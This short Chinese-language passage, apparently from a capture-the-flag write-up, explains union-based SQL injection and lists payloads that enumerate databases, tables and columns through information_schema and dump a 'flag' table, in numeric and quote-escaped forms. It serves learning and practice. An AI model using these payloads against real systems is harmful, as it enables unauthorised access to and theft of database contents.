查询语句1 union 查询语句2
我们要让查询语句1失效,查询语句2是我们注入的语句,返回正确的结果。如果id=-1,显然数据库查询不到,所以返回NULL,不显示,然后执行查询语句2显示正确的的结果。
-1 union select 1, group_concat(schema_name) from information_schema.schemata
-1 union select 1, group_concat(table_name) from information_schema.tables where table_schema='sqli'
-1 union select 1, group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'
-1 union select 1, group_concat(flag) from sqli.flag
-1' union select 1, group_concat(schema_name) from information_schema.schemata #
-1' union select 1, group_concat(table_name) from information_schema.tables where table_schema='sqli' #
-1' union select 1, group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag' #